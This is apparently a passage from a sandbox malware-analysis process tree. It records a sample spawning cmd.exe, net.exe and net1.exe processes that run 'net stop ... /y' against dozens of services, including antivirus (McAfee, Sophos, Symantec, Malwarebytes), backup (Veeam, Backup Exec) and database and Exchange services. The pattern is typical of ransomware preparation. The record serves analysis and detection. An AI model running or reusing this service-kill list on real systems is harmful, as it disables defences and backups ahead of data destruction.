  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:6816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_service /y
        5⤵
        
        PID:5196
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop EraserSvc11710 /y
  2⤵
  PID:5200
- - C:\Windows\SysWOW64\net.exe
    net stop EraserSvc11710 /y
    3⤵
    PID:7280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:7972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop EsgShKernel /y
  2⤵
  PID:5236
- - C:\Windows\SysWOW64\net.exe
    net stop EsgShKernel /y
    3⤵
    PID:6696
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:7456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop FA_Scheduler /y
  2⤵
  PID:5296
- - C:\Windows\SysWOW64\net.exe
    net stop FA_Scheduler /y
    3⤵
    PID:6664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:7488
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop IMAP4Svc /y
  2⤵
  PID:5376
- - C:\Windows\SysWOW64\net.exe
    net stop IMAP4Svc /y
    3⤵
    PID:7288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IMAP4Svc /y
      4⤵
      PID:7932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop IISAdmin /y
  2⤵
  PID:5328
- - C:\Windows\SysWOW64\net.exe
    net stop IISAdmin /y
    3⤵
    PID:6416
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:7136
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop macmnsvc /y
  2⤵
  PID:5448
- - C:\Windows\SysWOW64\net.exe
    net stop macmnsvc /y
    3⤵
    PID:7224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:7904
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop EPSecurityService /y
  2⤵
  PID:2584
- - C:\Windows\SysWOW64\net.exe
    net stop EPSecurityService /y
    3⤵
    PID:6436
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:6712
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop masvc /y
  2⤵
  PID:5524
- - C:\Windows\SysWOW64\net.exe
    net stop masvc /y
    3⤵
    PID:7608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:8188
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MBAMService /y
  2⤵
  PID:5616
- - C:\Windows\SysWOW64\net.exe
    net stop MBAMService /y
    3⤵
    PID:7664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:6956
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6044
- - C:\Windows\SysWOW64\net.exe
    net stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:8008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:8384
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop McAfeeFramework /y
  2⤵
  PID:6004
- - C:\Windows\SysWOW64\net.exe
    net stop McAfeeFramework /y
    3⤵
    PID:7992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:8408
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop McAfeeEngineService /y
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\net.exe
    net stop McAfeeEngineService /y
    3⤵
    PID:7956
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:8308
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop McTaskManager /y
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\net.exe
    net stop McTaskManager /y
    3⤵
    PID:8148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:8448
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop mfemms /y
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\net.exe
    net stop mfemms /y
    3⤵
    PID:8156
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:8472
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MMS /y
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\net.exe
    net stop MMS /y
    3⤵
    PID:6768
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:8624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop mfevtp /y
  2⤵
  PID:5792
- - C:\Windows\SysWOW64\net.exe
    net stop mfevtp /y
    3⤵
    PID:7584
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:8656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop mozyprobackup /y
  2⤵
  PID:6272
- - C:\Windows\SysWOW64\net.exe
    net stop mozyprobackup /y
    3⤵
    PID:8524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:8932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop McShield /y
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\net.exe
    net stop McShield /y
    3⤵
    PID:8036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:8132
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MBEndpointAgent /y
  2⤵
  PID:5832
- - C:\Windows\SysWOW64\net.exe
    net stop MBEndpointAgent /y
    3⤵
    PID:7744
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:1800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MsDtsServer110 /y
  2⤵
  PID:6564
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer110 /y
    3⤵
    PID:8772
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:9056
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSExchangeMGMT /y
  2⤵
  PID:6744
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeMGMT /y
    3⤵
    PID:8868
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:5536
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSExchangeSA /y
  2⤵
  PID:6932
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA /y
    3⤵
    PID:9020
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:1612
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSExchangeSRS /y
  2⤵
  PID:7100
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSRS /y
    3⤵
    PID:9028
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:8404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSExchangeMTA /y
  2⤵
  PID:6900
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeMTA /y
    3⤵
    PID:9012
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:7416
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSExchangeIS /y
  2⤵
  PID:6720
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS /y
    3⤵
    PID:8964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:7572
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSExchangeES /y
  2⤵
  PID:6632
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeES /y
    3⤵
    PID:8808
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:9184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MsDtsServer100 /y
  2⤵
  PID:6432
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer100 /y
    3⤵
    PID:8740
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:9096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MsDtsServer /y
  2⤵
  PID:6388
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer /y
    3⤵
    PID:8668
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:8904
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSOLAP$SQL_2008 /y
  2⤵
  PID:7240
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$SQL_2008 /y
    3⤵
    PID:8832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:8892
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OracleClientCache80 /y
        5⤵
        
        PID:8216
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:7312
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:9064
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:8352
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSOLAP$TPS /y
  2⤵
  PID:7508
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$TPS /y
    3⤵
    PID:8880
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$BKUPEXEC /y
  2⤵
  PID:7784
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$BKUPEXEC /y
    3⤵
    PID:7192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:6452
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSOLAP$TPSAMA /y
  2⤵
  PID:7588
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$TPSAMA /y
    3⤵
    PID:7052
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:6676
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:7888
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:7008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:4472
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$ECWDB2 /y
  2⤵
  PID:7872
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ECWDB2 /y
    3⤵
    PID:8648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:4944
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:7964
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:6788
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:1496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:8076
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:6528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:3448
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$SBSMONITORING /y
  2⤵
  PID:8120
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SBSMONITORING /y
    3⤵
    PID:7272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:1240
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
        5⤵
        
        PID:8184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$SQL_2008 /y
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQL_2008 /y
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$SHAREPOINT /y
  2⤵
  PID:8068
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SHAREPOINT /y
    3⤵
    PID:9068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:6468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$TPS /y
  2⤵
  PID:4344
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$TPS /y
    3⤵
    PID:6540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:7608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:8300
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:8772
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:6140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:8364
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:5600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:6248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher /y
  2⤵
  PID:8376
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher /y
    3⤵
    PID:9096
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher /y
      4⤵
      PID:6796
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:8516
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:4388
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:8420
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:7012
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:6568
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$TPSAMA /y
  2⤵
  PID:8204
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$TPSAMA /y
    3⤵
    PID:9184
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:8036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:6940
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:8688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:9036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:8692
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:7420
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:8580
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:10000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:6772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:8756
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:8444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:8564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:8852
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:7704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLSERVER /y
  2⤵
  PID:8976
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLSERVER /y
    3⤵
    PID:6180
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:7660
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:8912
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:8992
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLServerADHelper100 /y
  2⤵
  PID:9076
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100 /y
    3⤵
    PID:9416
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:8708
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MySQL80 /y
  2⤵
  PID:9140
- - C:\Windows\SysWOW64\net.exe
    net stop MySQL80 /y
    3⤵
    PID:7376
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLServerOLAPService /y
  2⤵
  PID:9120
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerOLAPService /y
    3⤵
    PID:7340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:8812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop OracleClientCache80 /y
  2⤵
  PID:5604
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\net.exe
    net stop OracleClientCache80 /y
    3⤵
    PID:8892
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ntrtscan /y
  2⤵
  PID:5592
- - C:\Windows\SysWOW64\net.exe
    net stop ntrtscan /y
    3⤵
    PID:6364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop PDVFSService /y
  2⤵
  PID:6304
- - C:\Windows\SysWOW64\net.exe
    net stop PDVFSService /y
    3⤵
    PID:7936
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:7024
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop POP3Svc /y
  2⤵
  PID:7716
- - C:\Windows\SysWOW64\net.exe
    net stop POP3Svc /y
    3⤵
    PID:8492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ReportServer /y
  2⤵
  PID:7732
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6484
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer /y
    3⤵
    PID:7488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:6696
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ReportServer$SQL_2008 /y
  2⤵
  PID:6588
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$SQL_2008 /y
    3⤵
    PID:8040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:6528
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:1060
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:7976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:7744
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MySQL57 /y
  2⤵
  PID:3940
- - C:\Windows\SysWOW64\net.exe
    net stop MySQL57 /y
    3⤵
    PID:7436
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ReportServer$TPS /y
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$TPS /y
    3⤵
    PID:7156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ReportServer$TPSAMA /y
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$TPSAMA /y
    3⤵
    PID:8816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop RESvc /y
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\net.exe
    net stop RESvc /y
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop sacsvr /y
  2⤵
  PID:4988
- - C:\Windows\SysWOW64\net.exe
    net stop sacsvr /y
    3⤵
    PID:8748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SamSs /y
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\net.exe
    net stop SamSs /y
    3⤵
    PID:6780
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:7632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SAVAdminService /y
  2⤵
  PID:8
- - C:\Windows\SysWOW64\net.exe
    net stop SAVAdminService /y
    3⤵
    PID:6756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:6208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SAVService /y
  2⤵
  PID:3612
- - C:\Windows\SysWOW64\net.exe
    net stop SAVService /y
    3⤵
    PID:7816
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:5420
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SDRSVC /y
  2⤵
  PID:4252
- - C:\Windows\SysWOW64\net.exe
    net stop SDRSVC /y
    3⤵
    PID:7892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:6936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SepMasterService /y
  2⤵
  PID:116
- - C:\Windows\SysWOW64\net.exe
    net stop SepMasterService /y
    3⤵
    PID:7192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:4956
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ShMonitor /y
  2⤵
  PID:6580
- - C:\Windows\SysWOW64\net.exe
    net stop ShMonitor /y
    3⤵
    PID:7244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:1072
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Smcinst /y
  2⤵
  PID:3992
- - C:\Windows\SysWOW64\net.exe
    net stop Smcinst /y
    3⤵
    PID:7648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:8620
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SmcService /y
  2⤵
  PID:1300
- - C:\Windows\SysWOW64\net.exe
    net stop SmcService /y
    3⤵
    PID:4224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:8680
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SMTPSvc /y
  2⤵
  PID:9248
- - C:\Windows\SysWOW64\net.exe
    net stop SMTPSvc /y
    3⤵
    PID:5684
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:6680
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SntpService /y
  2⤵
  PID:9292
- - C:\Windows\SysWOW64\net.exe
    net stop SntpService /y
    3⤵
    PID:8080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:7840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop sophossps /y
  2⤵
  PID:9304
- - C:\Windows\SysWOW64\net.exe
    net stop sophossps /y
    3⤵
    PID:4020
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:5268
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:9420
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:7444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:7392
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$ECWDB2 /y
  2⤵
  PID:9360
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ECWDB2 /y
    3⤵
    PID:2108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:6020
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:9336
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5964
  - - C:\Windows\SysWOW64\net1.exe
